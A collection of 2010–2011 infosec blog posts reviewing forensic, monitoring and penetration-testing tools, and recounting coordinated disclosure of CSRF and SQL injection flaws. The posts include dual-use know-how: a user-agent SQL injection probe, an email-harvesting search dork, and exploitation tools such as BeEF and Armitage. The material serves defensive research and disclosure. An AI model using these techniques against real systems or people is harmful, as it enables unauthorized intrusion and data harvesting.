Following are real conversations overheard in the aisles at (ironically) the RSA Conference.
1) What is the ROI on your SEM, and will it detect any APTs on my LAN?
2) Does the TCO justify spend for a SaaS/cloud solution; you know, an MSSP?
3) Wait, what about APT in the cloud? If I use a Saas-based SEM to manage events on my cloud-based services, will it still find APTs?
All opportunities for chastisement and disdain aside, commercial solutions clearly are an important part of the puzzle but are far from preemeninent as the only measure of detection and defense.

Instead, Assessing Outbound Traffic to Uncover Advanced Persistent Threat, proposes that:
"Advanced Persistent Threat (APT) exhibits discernible attributes or patterns that can be monitored by readily available, open source tools. Tools such as OSSEC, Snort, Splunk, Sguil, and Squert may allow early detection of APT behavior. The assumption is that attackers are regularly attempting to compromise enterprises, from basic service abuse to concerted, stealthy attempts to exfiltrate critical and high value data. However, it is vital to practice heightened operational awareness around critical data and assets, for example, card holder data, source code, and trade secrets. Segment and wrap critical data within the deeper protection of well monitored infrastructure (defense in depth). Small, incremental efforts, targeted at protecting high value data value (typically through smaller and protected network segments), provide far greater gains than broader, less focused efforts on lower value targets. In a similar vein, layered defensive tactics (multiple layers and means of defense) can prevent security breaches and, in addition, buy an organization time to detect and respond to an attack, reducing the consequences of a breach."

This perspective is shared by Jason Andress, in his ISSA Journal cover article, Advanced Persistent Threat Attacker Sophistication Continues to Grow?
Jason's article fortuitously hit the wire at almost exactly the same time our paper went live on the STI site, as if to lend its voice the arguement:
"This paper discusses what exactly APT is, whether or not it is a real threat, measures that can be implemented in order to mitigate these attacks, and why running out to buy the latest, greatest, and most expensive security appliance might not be the best use of resources."

You will find consistent themes, similarly cited references, and further useful resource material in Jason's excellent work. I look forward to seeing more of Jason's work in the ISSA Journal in the future.

In closing, from our paper:
"Even the best monitoring mindset and methodology may not guarantee discovery of the actual APT attack code. Instead, the power of more comprehensive analysis and correlation can discover behavior indicative of APT-related attacks and data exfiltration."

If APT worries you as much as it seemingly does everyone, give the papers a read, take from them what suits you, and employ the suggested tactics to help reduce attack vectors and increase situational awareness.

Cheers and good luck.

toolsmith: Xplico

2011-06-02T23:02:00.000-07:00

Those of you who make use of Network Forensic Analysis tools (NFAT) such as NetworkMiner or Netwitness Investigator will certainly appreciate Xplico.
June's toolsmith covers Xplico, a project released under GPL that decodes packet captures (PCAP), extracting the likes of email content (POP, IMAP, and SMTP protocols), all HTTP content, VoIP calls (SIP), IM chats, FTP, TFTP, and many others.
If you'd like a breakdown on the protocols you can grapple with check out the Xplico status page.
You can imagine how useful Xplico might be for policy enforcement (spot the pr0n), malware detection (spot the Renocide), or shredding IM traffic (spot the data leak).
Experimenting with Xplico is also a great chance to check out Pcapr, Web 2.0 for packets. ;-)
Xplico inlcudes a highly functional Web UI with great case and session management as seen in Figure 1.

Figure 1

With a resurgence of discussion of APT given the recent bad news for RSA, as well as all the FUD spawned by Sony's endless woes, I thought a quick dissection of an Aurora attack PCAP would be worth the price of admission for you (yep, free) as seen in Figure 2.

Figure 2

You'll note the beginning of a JavaScript snippet that has only the worst of intentions for your favorite version of Internet Explorer as tucked in an HTML page.
Copy all that mayhem to a text file (in a sandbox, please), then submit it to VirusTotal (already done for you here) and you'll note 26 of 42 detections including Exploit:JS/Elecom.D.
Want to carve off just that transaction? Select the pcap under Info from the Site page under the Web menu selction as seen in Figure 3.

Figure 3

Voila!
Ping me via russ at holisticinfosec dot org if you'd like a copy of the above mentioned Aurora PCAPs.

Also, stand by for more on APT detection in outbound traffic in the next day or two.

Your gonna like this tool, I guarantee it.
Check out the article here and Xplico here .

Cheers.

Cyber Defense Challenge: Analogies

2011-05-26T09:58:00.000-07:00

First, an apology. I've not been posting much; heads down on grad school work.

I recently had the opportunity to interview Alexei Czeskis, the captain of the University of Washington (UW) team who won this year's National Collegiate Cyber Defense Competition (CCDC).
During my discussion with Alexei I was immediately drawn to the fact that his approach and tactics closely mirror those of mature security incident response teams.
First, a quick break down on the CCDC:
"You have just been hired as the network and security administrators at a small company and will be taking administrative control of all information systems. You know very little about the network, what security level has been maintained, or what software has been installed. You have a limited time frame to familiarize yourself with the network and systems and to begin the security updates and patches before the red team starts actively attacking your company. In the midst of all the commotion, you have to keep up with the needs of the business and user demands while maintaining service level agreements for all critical Internet services. Welcome to the first day of the National Collegiate Cyber Defense Competition (CCDC)."
The CCDC process begins with regional contests wherein 100+ schools participate at the appropriate regional contest from January until the end of March.

The UW team has won the regional all four years it's participated.

That said, they had not achieved success at the national level due to what Alexei described as a lack of planning and strategy.
Analogy 1: You cannot be successful at incident response without standard operating procedures, defined roles, practice and drilling, as well common strategy.
Of the steps Alexei prescribed for his team in advance of the contest(s):
• Roles predefined
• Have a “three hour plan”: what are your first steps for identification of vulnerabilities, short term mitigations, and longer term remediation and hardening
• Practice in advance, ensure broad knowledge
• Define primary and secondary subject matter expert for each roll
• Define a true "captain" (officer)
• Team members concentrate on their individual domains

According to Alexei, maintaining order was key to winning.
Analogy 2: Incident "management" is essential. This role includes conflict resolution, and motivation.
Some of Alexei's key pointers:
1. It's important to know your players’ (incident responders’) weaknesses.
2. Identify those who can’t multitask or self-manage; some people need direction, some don’t.
3. Learn who needs help but won’t ask.
4. Human component is massive, know as much as you can in advance (of an incident)
5. One person managing is hugely important.
6. Keep morale up; team cohesion is the most important thing!
With six undergrads, an additional grad student, and Alexei as captain, the UW team managed to keep a very concerted, highly capable red team (military, penetration testing professionals) at bay.
As an example, we're talking about Air Force people who like to write their own Windows rootkits and wreak havoc on unsuspecting blue teams.
The CCDC always includes an interesting element, a "white" team if you will, to throw in administrative overhead, define use of social media, and introduce some real reliability elements.

New this year was a "cloud" component, executed via virtualization (lack of access, no IDS (span), and no firewall making it very difficult to defend).
Analogy 3: Incident response in the cloud is difficult! Cloud response includes requirements of components and features often well beyond your control.
Alexei and team learned some painful lessons quickly:
It’s easy to lock out of cloud machines (be gentle); don't enable the firewall but forget to add exception for yourselves.

Some closing points from our discussion.
Alexei would utilize these tactics if he were employed as a security incident manager.
He stressed avoiding big morale hits, and to "just worry about doing your best, not winning."
As a security incident manager, I can tell you with certainty that this is sound thinking and methodology.
It's not about winning, but it is about trying to be excellent in tactics and service.

Alexei and the UW team are clearly excellent: well done!

del.icio.us | digg | Submit to Slashdot

toolsmith: Security Onion

2011-05-04T12:40:00.000-07:00

You, dear readers, all know I'm a tool dork.
Quite possibly, some of you may further think I'm a tool and/or a dork; we'll take that for granted. ;-)
When I write toolsmith each month, I end up immersing myself very deeply in the intended tool topic. My effort for May 2011 was no different; I went way down the rabbit hole with Doug Burks' Security Onion (SO).
Net result? Mad props.
Doug continues to enhance what is the most immediately useful Live CD/DVD available to NSM practitioners.
I'll let my conclusion from the article serve as impetus for your further reading and use of Security Onion:
"I’ll try to avoid flagrant gushing, but Security Onion employs a congregation of the most important tools available to security and network analysts that I’ve ever discussed. Attack and reconnaissance tools are important, but I am the ultimate blue-teamer at heart. I’ve said it before: “What you don’t see can hurt you.” You can see better with Security Onion and its well-implemented deployments of Snort/Suricata, SANCP, and Sguil/Squert. I will simply say that you can defend yourselves, and those you are charged with protecting, better with the likes of Security Onion."

Detect web attacks against actual SO infrastructure? Done.

Detect scans against reporting hosts via Emerging Threats sigs with instant correlation? Done.

Visualize related output with Squert and AfterGlow? Done!

Repeating from article again:
"Job well done, Doug. As an ISSA member I’m proud of your work and your contributions to our association and community.
Readers, take advantage of this noteworthy effort."

Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers.

del.icio.us | digg | Submit to Slashdot

toolsmith: OpenVAS-4

2011-04-03T21:35:00.000-07:00

Between writing this post and writing April's toolsmith a couple of weeks ago, I used OpenVAS-4, April's toolsmith topic, for a penetration testing engagement rather than the other freely available vulnerability scanner.
The project leads just released OpenVAS-4 in March and it offers some noteworty enhancements.
Between the highly functional web UI, the Greebone Security Assistant, and the impressive scan configuration methodology, I may be a convert.

OpenVAS-4 offers seriously strong report-fu; an essential part of successful engagement tooling.
I also find the ability to slave multiple OpenVAS Managers to one Manager to load balance and distrbute resource intensive scan tasks.

As part of recent testing I discovered a host running the Mongoose web server.

It's here we'll have some fun, a contest if you will, more of a guessing game than anything.
On what specific host type was Mongoose running?
Hint: Keep in mind that Mongoose is an "easy to use web server. It also can be used as embedded web server library to provide a web interface to applications."
First correct guess received via holisticinfosec at gmail dot com will receive an information security book of my choosing.

Check out OpenVAS; I think you'll be impressed.
Cheers.

OWASP Top 10 Tools and Tactics @ InfoSec Resources

2011-03-24T23:02:00.000-07:00

I've been a busy lad of late and haven't been keeping up on posts, but I have been turning out some work elsewhere.
If you haven't already taken note, checkout my second installment for InfoSec Resources, specifically OWASP Top 10 Tools and Tactics.
It even made #4 on Reddit under NetSec and was March 24th's Post of the Day on PenTestIT. ;-)

{excerpt}

Lesson 1:

Software will always have bugs and by extension, security vulnerabilities. Therefore, a practical goal for a secure software development lifecycle (SDLC) should be to reduce, not necessarily eliminate, the number of vulnerabilities introduced and the severity of those that remain.

Lesson 2:

Exploitation of just one website vulnerability is enough to significantly disrupt online business, cause data loss, shake customer confidence, and more. Therefore, the earlier vulnerabilities are identified and the faster they are remediated the shorter the window of opportunity for an attacker to maliciously exploit them.

The conclusion is therefore simple: reduction and remediation of web application security flaws will shrink the number of attack vectors and improve security posture. Ground breaking, right? No, it’s old news, “security posture” is a worn out buzz phrase, and if everyone was diligent about the above mentioned reduction and remediation, we’d likely not need a Top 10 list or a 12th Website Security Statistic Report (count on one). But hey, then we’d have to find different work, right?

Gifford Pinchot once said “Never bet on a race unless you are running in it.”

As solutions are always better than complaints, let’s discuss how to get in the race with some tooling options as we explore each of the Top 10.

{/excerpt}

You know I'm an SDLC fan, and an ardent supporter of OWASP. This article blends those passions along with some insight as to how I conduct web application vulnerability research.

Note: Over the next few months, I'll be drilling into to each of the OWASP Top Ten, exploring the specific vulnerability and the aforementioned tooling and tactics to aid in better discovery and mitigation.
Look forward to those followup articles at InfoSec Resources.

Hope you enjoy.
Cheers.

Book Review: Python 2.6 Text Processing

2011-03-06T11:49:00.000-08:00

Python is a powerful and dynamic programming language that is used in a wide variety of application domains such as web and internet development, databases access, desktop GUIs, scientific and numeric, education, network programming, software development, as well as games and 3D graphics.
As a security analyst I'm always interested in ways to better query vast quantities of text such as parsing web server logs for various signs of evil.
Jeff McNeil's Python 2.6 Text Processing Beginner's Guide from Packt Publishing struck me as useful resource with which to improve Python skills specific to text processing.
This book is intended for novice Python developers interested in processing text (me), and is laid out and written so as to be very supportive of this cause.
First published in December 2010, Python 2.6 Text Processing is organized via these conventions:

Time for action - inclusive of multiple instructions followed by extra detail and explanation (What just happened?)
Pop quiz - to help you test your understanding of methods just discussed
Have a go hero - practical challenges to put your learning to use

I appreciate the logical flow of the book, moving from basic concepts and IO handling, to strings services and standard library usage, to regular expressions, structure markup, encoding, and advanced output.
With my interest in web server log manipulation I found myself able to quickly embrace the concepts offered and make us of this book's code samples offered on the Packt Publishing website.
Anyone who operates a website and spends any time reviewing web logs is likely aware that a certain percentage of all traffic bound for their site is malicious, be it uniquely targeted or bot traffic crawling by looking for weak spots.
One such example is remote file include (RFI) attempts. I've been using a Perl script to parse my logs for such traffic but have wanted to use such analysis as an opportunity to learn Python and ultimately rewriting the scripts in Python. While I haven't gotten there yet, I am certain this book will aid me entirely.
Of additional use is the fact that Python 2.6 Text Processing offers additional resources such documentation APIs, community resources such as mailing lists and conferences, as well as discussion of Python 3 and what to expect in migrating.
Returning to the RFI analysis mentioned above, I used Python to pull interesting, related results out of my web logs.
While Chapter 2 of Python 2.6 Text Processing introduces a web server log parser, and builds on it through out the chapter, I was drawn to searching and indexing as described in Chapter 11 via the use of the Nucular libraries (no, not the Bush mispronunciation).
"Nucular is a system for creating full text indices for fielded data. It can be accessed via a Python API or via a suite of command line interfaces."
First, ensure that you've installed the SetupTools easy_install system via python ez_setup.py as discussed on page 23. Once installed issue easy_install nucular, and the libraries and related dependencies will be installed to the appropriate paths.
With some modifications to the provided code samples, I then created an index of three years worth of web logs from my site, and was able to query them as a single source for keywords indicative of RFI attacks. While I started with a simple linear search across multiple logs via text_scan.py as seen on page 302 I quickly learned why McNeil is proving the linear search method as laborious and ineffective, instead promoting the use of libraries such as Nucular, and he's right.
Overall, this book is an effective learning tool, though keep in mind that it's entirely Linux-centric. Syntax for those of you using Python on Windows is subject to nuances.
McNeil's done a solid job with Python 2.6 Text Processing Beginner's Guide; it's a verbose (sometimes he turns on the fire hose) but worthy read and a suggested purchase at $45 +/- direct from Packt, Amazon, or Barnes and Noble, earning 3.5 stars out of 5 (very good).
Give it a read and put those mad new Python skills to good use.
Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

More on OSINT with FOCA 2.6 in toolsmith

2011-03-02T13:44:00.001-08:00

“If ignorant both of your enemy and
yourself, you are certain to be in peril.” - Sun Tzu

I'm on a bit of an OSINT kick lately, and I nearly flipped out when I began to research FOCA for toolsmith, then realized the raw, unadulterated power I had yet to make use of.
Shame on me. Don't make the same mistake I did; download FOCA 2.6 pronto.
If you're a penetration tester, this is hands down one of the best reconnaissance tools I've ever imagined. Fear the FOCA indeed.
Really, fear it. You need to be careful with this tool. You can easily walk yourself right into potential legal concerns if you don't proceed with caution and permission.
Consider yourself duly warned.
FOCA is the product of the team at Informatica 64, including Alejandro Martin Bailon and Chema Alonso, who were helpful as I wrote this March's column.

FOCA (Fingerprinting Organizations with Collected Archives) 2.6 is an interesting tool that focuses heavily on document metadata extraction while incorporating other extreme search capabilities. Rather than depending on a variety of recon methods, FOCA will provide many related services for you.
The FOCA project leads have indicated that for more than the last year and a half FOCA has been a primary tool in their own engagements.

Definitely check out their DEF CON 18 presentation; it's truly entertaining and richly informative.

The metadata functionality as seen in Figure 1 speaks for itself.

Figure 1

If that's not enough for you, the advanced network reconnaissance and enumeration capabilities ought to seal the deal as seen in Figure 2.

Figure 2

There also an online version of FOCA.

The article can be found here.

Enjoy and be careful. ;-)

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

OSINT: large email address list imports with Maltego

2011-02-17T19:38:00.001-08:00

Fans of OSINT are inevitably fans of Maltego; I count myself amongst the dedicated.
Given the recent HBGary debacle, you'll soon see where the following discussion may prove useful for discovery of relationships between entries in a large list of email addresses. Consider the prospect of grepping through the HBGary emails, culling out a list of unique entries, then transforming them as an entirety via Maltego to determine what other relationships may exist between entrants.

I've been hoping for some large list import functionality via Maltego local transforms, and Andrew at Paterva immediately provided upon request.
Imagine similar functionality as found in transforms discussed earlier where a CSV inclusive of IP addresses is imported (this older method was via Phrase entity pointed directly to the full path of the CSV), then unique IP address entities are populated to the Maltego UI workspace.
For our current scenario, Andrew has provided me (and thus you) with local transforms that will allow import of a CSV, now using EasyDialogs (Linux, Windows) inclusive of multiple email addresses, and populate them each as unique Email Address entities to the Maltego UI workspace.

Making sense?
I'll walk you through it.

First, ensure that you grab EasyDialogs as mentioned above and embed it properly with your Python interpreter.
Second, grab getEmailAddresses.py, the above mentioned local transform for email address list imports, and configure it for use with your Maltego instance.

Now, let's start with a googledork.
email addresses filetype:csv senator

The second hit yields a CSV of Virginia state delegates affiliated with the Hampton Roads Partnership.
Looks like fun.
NOTE: This is entirely benign OSINT, simply a good object model for validation of our new local transform.

After cleaning up the CSV to include only a column inclusive of the delegates email addresses, drag a Phrase entity onto the Maltego workspace; I named mine Virgina Delegates.
Right-click the Phrase entity, select Run Transforms, then Other Transforms, then getEmailAddresses. A pop-up window will appear (EasyDialogs) and ask you "Which file do you want to use?"
Give it the path (I used the shell extension CopyPath) to your CSV file and click OK.
Results will be populated as seen in Figure 1.

Figure 1

Highlight all the resulting Email Address entities that are now populated in the Maltego workspace, right-click the selection, choose Run Transforms, then Other Transforms, then To Website [using Search Engine]. It'll take a few minutes to run as there's some crawling to be done.

The Mining View of the results can be a bit of kluge as seen in Figure 2.

Figure 2

This transform is best viewed as Edge Weighted (Figure 3).

Figure 3

See the commonality regardless of view?
Both result sets point out the fact that one of the most significant relationships all these delegates share is...wait for it...the website for the firm owned by the person I can only imagine is...ta-da...their lobbyist!
Politics as usual. ;-)

Enjoy this transform, and stay tuned for more discussion of similar transforms.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

El Jefe: The Boss Will See You Now

2011-02-05T14:21:00.000-08:00

The February 2011 edition of the ISSA Journal includes toolsmith on the topic of El Jefe 1.1.
The boss, the big kahuna, El Jefe requires his due. From the folks at Immunity, El Jefe is a solution that intercepts native Windows API process creation calls, allowing you to track, monitor, and correlate process creation events.
Going many steps beyond tracking simple process creation, El Jefe provides a microscopic view of the binaries that are run: SHA1, PID, flags, sorted chronologically with spawned offspring while click-able for instant analysis.
You'll enjoy centralized storage; data which can be queried from the Django-based web app.
Setup is quite straightforward, making use of El Jefe equally so.
I experimented various malware types including Bifrost and Zeus on victim VMs and results were immediate.
Strings references were quickly revealed via Binary Information as seen in Figure 1.

Figure 1

Captured client logging includes evidence of intrusion based on suspicious entropy as seen from a Zeus infected VM in Figure 2.

Figure 2

I enjoyed researching El Jefe's capabilities to no end.
Well done and thanks to Immunity's Justin Seitz.

The article is posted for you here.

Speaking of things Zeus related, I'm presenting Malware-Proof: Building Resistant Web Applications at the RSA 2011 eFraud Network Forum (invitation only). See you there if you happen to be a signed-up attendee.

Enjoy and cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

2010 Toolsmith Tool of the Year: SIFT 2.0

2011-01-31T21:04:00.000-08:00

As voted by you, the readers, the 2010 Toolsmith Tool of the Year is SIFT 2.0.
The SANS Investigative Forensic Toolkit (SIFT) Workstation Version 2.0, as discussed in May's ISSA Journal, is a Linux distribution that is preconfigured for forensic investigations. Created by Rob Lee for the SANS 508 track, SIFT 2.0 includes all the tools a forensic analyst/incident responder would require to conduct a thorough system investigation. I particularly favor it for memory analysis - grab a memory image from your victim system; pull it back to your SIFT VM and get down to business in no time flat.

Of 76 votes, SIFT 2.0 came in first with 24 votes (31.6%).
Rounding out the top five:
2) Firefox Addons for Security Practitioners with 20 votes (26.3%)
3) SamuraiWTF with 18 votes (23.7%)
4) NetWitness Investigator with 12 votes (15.8%)
5) Confessor and MOLE with 8 votes (10.5%)

On behalf of the ISSA Journal and I, congratulations to Rob Lee and his team!

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

toolsmith: Armitage - Cyber Attack Management for Metasploit

2011-01-03T10:32:00.001-08:00

Raphael Mudge's Armitage is the subject of January 2011's toolsmith in the ISSA Journal.
Armitage is a "cyber attack management" platform for Metasploit.
Depending on your background or the availability of commercial tools in your environment (Core, Canvas, etc.), your comfort with Metasploit likely varies
with the depth of your experience. Armitage1 is designed to help close some of the experience or comfort gaps, described by the developer as useful for “non-hackers”.
For use as a demonstration tool to elucidate vulnerabilities and their exploit to management or customers, Armitage is excellent.
Basic Armitage workflow (should be familiar to all pentesters):
Create a workspace, conduct or import scans, identify vulnerabilities, determine appropriate attacks, gain access, and further your presence in the environment.
I've always loved the premise of attack pivoting. Gain a foothold on one system, them jump off to another host or network. Armitage definitely supports such thinking. ;-)
Download Backtrack 4 R2, install Armitage, and see what you think. I enjoyed testing it for this article immensely; I believe you'll find it equally useful.
Download the article here.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Help choose the 2010 Toolsmith Tool of the Year

2011-01-01T17:51:00.001-08:00

Rather than choose the best of 2010 myself, I need your help choosing the 2010 Toolsmith Tool of the Year.
We covered a lot of excellent information security-related tools in 2010; which one did you believe was the best?
I appreciate you taking the time to make your choice here.
Results will be announced February 1, 2011.

toolsmith: SamuraiWTF

2010-12-01T11:25:00.001-08:00

December's toolsmith covers SamuraiWTF.
I'll repeat myself as stated in the article:
SamuraiWTF rocks, plain and simple.
It’d be my 2010 Toolsmith Tool of the Year but alas, I am letting you, dear reader, make that “Tool of the Year” decision for 2010 (poll details to follow as 2010 draws to a close).

SamuraiWTF is a LiveCD Linux release designed to serve you for your web pen-testing needs. Kevin Johnson of Secure Ideas and Justin Searle of InGuardians included what they believe are the best of the open source and free tools that focus on testing and attacking websites, selections based on the tools they use as part of their job duties. SamuraiWTF includes tools useful in all four steps of a web pen-test:
• Reconnaissance – Fierce domain scanner, Maltego (be sure to check out the Shodan Maltego add-on)
• Mapping – WebScarab, ratproxy
• Discovery – w3af and burp
• Exploitation – BeEF, AJAXShell

The article walks through using SamuraiWTF for each phase, but as always, I had the most fun exemplifying exploit methodology with BeEF.
Browser zombies rule! ;-)

If you seek to learn a ton about web application security testing, or consolidate all the tools you’ll likely need on one system, SamuraiWTF is for you.
As Kevin indicated for the article, you can use SamuraiWTF as your base install, then enhance with Burp Suite Pro if you happen to be a commercial Burp user.
Stay tuned for the SamuraiWTF 1.0 release, and contribute to the project if so motivated.

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

CSRF mitigation: 4images Gallery's comprehensive approach

2010-11-11T21:38:00.000-08:00

Once in awhile, in my quest to break (and promote fixing of) every web application I encounter, I have email discussions with some excellent people who reach out to me after the initial advisory during a coordinated disclosure.
Such was the case with Kai S. of Dots United GmbH, the team who develops the 4images Gallery.
Just a day or two after he'd been contacted by Secunia, whom I submit my vulnerability findings to for disclosure coordination, I heard directly from Kai. He asked me to provide more detail with regard to the finding indicating that 4images Gallery accepted "HTTP requests without performing any validity checks to verify the request", better known as cross-site request forgery (CSRF).
After replying with my proof of concept and some resource material, Kai replied that he would "forward this to our developers so we can release a fixed version".
On October 27 Dots United released a fix for all versions up to and including 1.7.8.
On November 10, the 4images Gallery team released version 1.7.9 inclusive of global CSRF mitigation.
In addition to a deserved "Well done!" for excellent communication as well as a timely fix turnaround, I'd like to applaud their direct approach to the fix, seemingly based on OWASP recommendations. Should all web application developers take a similar path, we'd likely see a reduction in CSRF vulnerability statistics.

Let me walk you through some of the 4images Gallery CSRF mitgation methods.
The core of the protection is includes/csrf_utils.php; CSRF protection is enabled by default.
As created by csrf_utils.php, generate a random MD5-derived token:

Return said token to the form as follows:

Then when some jerk like me comes along and throws something nasty at an admin...

...the attacker is thwarted by a unique, random token.

Add to the above-mentioned functionality the fact that the 4images devs allow you to take advanced control of CSRF protection via the config.php file. You can manage the default bit or maintain granular control of frontend/backend protection, token expiration, CSRF protection variable naming, and even XHTML vs. HTML.

I appreciate the efforts undertaken by Kai and the Dots United team in response to this vulnerability, and look forward to other development teams/vendors hopefully taking a similar tack.
Happy sailing. ;-)

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

toolsmith: Confessor & Mole for IR & security analysis

2010-11-02T20:36:00.000-07:00

As November 2010's toolsmith kicks off the fifth year of the column for the ISSA Journal, I am proud to use it as an opportunity to announce the official release of Bryan Casper's Confessor and Kris Thomas' MOLE.
I discussed these tools at ISSA International in September and again at SecureWorld Expo Seattle, and after a slight delay to clarify licensing (they're released under the Microsoft Public License (Ms-PL), both tools are available for you on CodePlex.
These tools were born of needing better utilities for incident response and security analysis in complex, massive cloud-like environments.
If you'd like a copy of the above-mentioned presentation, please contact me and I'll send it to you.

As described in the article, Bryan's Confessor answers the challenge of collecting system logs and attributes on hundreds or even thousands of systems at the same time, utilizing the same tools as MIR-ROR, but deploying them in an enterprise capable manner.
Note: Since the article's release Confessor has been updated to pass domain credentials via the UI and process host names as well as IP addresses.

Kris' MOLE was spawned improve on a method I’d been utilizing to cull malware from malicious URLs sent across Windows Live Messenger. Where I’d been using a specific wget string at the command-line Kris built MOLE (Malicious Online Link Engine) as a wrapper for wget that includes many additionally useful features.

We find these tools incredibly useful and are very pleased to be able to release them for public consumption as freely available and open source.

The article is here, Confessor is here, and MOLE is here.

Please ping me if you have questions; we look forward to your feedback.
Comments welcome here or via email.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

Checking for user-agent header SQL injection vulns

2010-10-19T18:32:00.000-07:00

As I analyze various web applications in the name of fun or fortune, I am sometimes treated to those little reminders that result in a "doh!".
Such was the case when I was assessing the latest release of the Avactis Shopping Cart.
I'd just installed the latest free version (1.9.1). Typically, after finding a flaw in an vendor's offering, I sign up for their new release notices, and had recently received one from Avactis.
When last I'd visited said shopping cart I'd spotted a couple of XSS bugs in the checkout.php script for version 1.8.1 and earlier. I admit that at the time I did not do as robust review of the application as I might now; in all likelihood the following bug was present when the XSS bugs were disclosed in September 2008.

With a fresh version installed thanks to the reminder, I fired up Firefox with Tamper Data, and started poking around. With Tamper Data, as we've discussed before, any web form input parameters/variables are subject to your manipulation.
I habitually work from the right side of the Tamper Data UI wherein POST parameters reveal themselves.
There I sat, happily walking through the app, when the bell went off.
"Hey, Russ, don't forget to fuzz the header values too!"
Cross-site scripting and SQL injection specific to cookie values is certainly not unheard of but you may need to refer to a checklist to always remember to probe them for vulnerabilities.
In my case, this was even more true of the user-agent string value.
Not all apps are written to capture the user-agent data, but you can easily understand why shopping cart providers would make use of such information.
What's the point? Remember to investigate the user-agent header for issues too.
It can be a simple as appending a single tic on the end of the user-agent string and submitting it, as seen in Figure 1.

Figure 1

The results were immediate and revealing. In case you wondered what my typical user-agent entry looks like, Figure 2 will enlighten.

You can see that we've caught the query executed by /var/www/avactis/avactis-system/modules/reports/report-collectors/report_data_visitors_stat_collector.php, specifically SELECT_WEB_ROBOT_ID, and the result.
Which, in turn, clearly justifies the rapid and responsive patch provided by the vendor. I submitted the finding to Secunia on October 10th and the vendor posted the patch on October 12th; Secunia Advisory SA41764 was released as q result on October 14th.
A hearty "Well done!" to the Avactis team for that turnaround.

A quick diff of report_data_visitors_stat_collector.php from version 1.9.1 build 8356 as installed on October 9th and the patched version downloaded today is seen in Figure 3.

Figure 3

The tale is quickly told, and it's a good move by the Avactis dev team.
Begone ye damned addslashes()!
Note that the dev yanked use of the addslashes function on lines 49, 157, 238, and 318; addslashes() is a subject to circumvention, mysql_real_escape_string() is recommended.

See how much we can learn when remembering to be more thorough?

I must say, if I hadn't recently renewed my status as a certified Application Security Specialist, I might have missed this vulnerability altogether.
And I definitely would have missed out on the additional benefits such as photo opportunities with app sec glitterati (taken at the recent BlueHat). ;-)

Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

toolsmith: The NirSoft Collection

2010-10-09T16:32:00.000-07:00

As I mention in this month's toolsmith, I am often reminded of all the tools I have not yet written about but have used on numerous occasions or even forgotten about. Such is the case with the NirSoft tools, particularly those found on the Windows side of the Helix distribution under IR.
Five NirSoft tools resurfaced for me well worthy of toolsmith mention as well as a place in the jumpkit.

Incident handler Kris Thomas used CurrPorts during a PCI DSS-related incident response drill we were conducting and promptly located the fake malicious process I’d seeded on a server as part of the drill.
Light-bulb moment: October's ISSA Journal toolsmith: The Nirsoft Collection is written to help you prevent one of those "doh!" moments. "Oh yeah, I'd forgotten all about that tool."
I'll simply rehash visual results of various tests I conducted for October's article.
Figure 1 is a CurrPorts screen shot taken before infection of the test VM with Backdoor.Win32.Agent.adqt (MD5: 6DBA44B457414593A858A3520A2F2278).

Figure 1

Figure 2 is the same view post-infection with the addition of bonus IPNetInfo results.

Figure 2

OpenedFilesView is exactly what it says it is, open or locked files on a given Windows system.

Figure 3 is an OpenedFilesView snapshot before infection with Backdoor.Win32.Poison.apec (MD5: CB702C3319A27E792B84846D3D6C61AD).

Figure 3

Figure 4 represents OpenedFilesView perspective post-infection where you'll note that the malicious binary has invoked Internet Explorer as we see changes to index.
dat. A quick review of C:\Documents and Settings\...\Cookies\ shows two cookies written to the system dated 9/26/10 for globo.com. Again, a bit of search engine research via site:threatexpert.com globo.com will reveal endless hits on various malicious behavior associated with globo.com, with particular emphasis on Brazilian malware.

Figure 4

Like it's fellow OpenedFilesView, WhatInStartup couldn't be more precise in its naming if it tried. Yep, it identifies what auto-loads when the system starts; always a good place to look for malicious basterds [sic].
Figure 5 is a WhatInStartup baseline screen-shot.

Figure 5

Figure 6 shows WhatInStartup results after a rogua AV (Security Essentials 2010...annoying!) infection; specifically, Trojan.Win32.FraudPack.amgz (MD5: 59C0E80D7F9705D10DA91E01B2763E9A)

Figure 6

Last but not least, NirCmd. This tool is interesting not overtly security-centric but good for pulling up registry entries or killing processes particularly when explorer.exe is hung.
Example: nircmd.exe regedit “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”

The article is available here, the tools and others are here.
Use these oldies but goodies in good stead.
Cheers.

del.icio.us | digg | Submit to Slashdot

Please support the Open Security Foundation (OSVDB)

CSRF on the increase per two reports

2010-09-18T13:54:00.000-07:00

As I've spent almost all of my research time this past year focusing on finding and disclosing (coordinated) CSRF vulnerabilities, it was with some amusement that I read CSRF Vulnerabilities Rise, Overall Vulnerability Disclosures Dip from Kelly Jackson Higgins last week.

Therein she states that "overall, the number of vulnerability disclosures for the year is gradually declining to around 4,500 from nearly 7,000 last year, with the exception of CSRF, which had 155 vulnerabilities as of the first half of the year." This article is ultimately referring to TippingPoint DV Lab's Top Risks report.
Wolfgang Kandek, CTO at Qualys, follows with "CSRF is difficult ... and complex."
I must respectfully disagree, it's really not, but I'll discuss that in a minute.

I was pleased to run into Jeremiah Grossman at the ISSA International Conference last week, and he stated that CSRF has moved up on the imminently pending 10th WhiteHat Security Statistics Report. He was careful to pointy out however that its not because sites are more vulnerable to CSRF; rather, WhiteHat Security customers are more interested in having the issue reported combined with better Sentinel detection.
The point about better detection on WhiteHat's part ties back to my disagreement over the claim that CSRF is difficult and complex.
